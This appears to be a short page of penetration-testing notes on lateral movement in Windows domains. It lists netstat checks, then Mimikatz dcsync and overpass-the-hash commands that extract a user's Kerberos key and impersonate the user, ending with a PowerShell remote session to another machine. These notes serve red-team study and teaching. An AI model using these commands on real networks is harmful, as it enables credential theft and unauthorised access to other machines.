Lateral Movement

Jump to other users inside the machine, don't jump into a hole for a long time.

Check Active Network Connection

Check possibility of hidden network or ports.

# Windows
netstat -antp

# linux
netstat -tulpn

Type of Lateral Movement:

  • Pass-the-Hash, Pass-the-Ticket, Overpass-the-Hash and bypass MFA for access to Windows

  • Lands on system via phishing

Mimikatz to bypass MFA --> use dcsync 

lsadump::dcsync /user:<current user>
# get the HASH from [Primary:Kerberos-Newer-Keys *] --> [Credentials] --> [aes256_hmac]

# overpass the hash
sekurlsa::pth /user:<current user> /domain:<domain> /aes256:<HASH>

# cmd appears as another user in the another machine

# access other computer
Enter-PSSession -ComputerName <other computer>

# ref: https://www.youtube.com/watch?v=Fmbp34dBuMc

PreviousPrivilege EscalationNextLinux

Last updated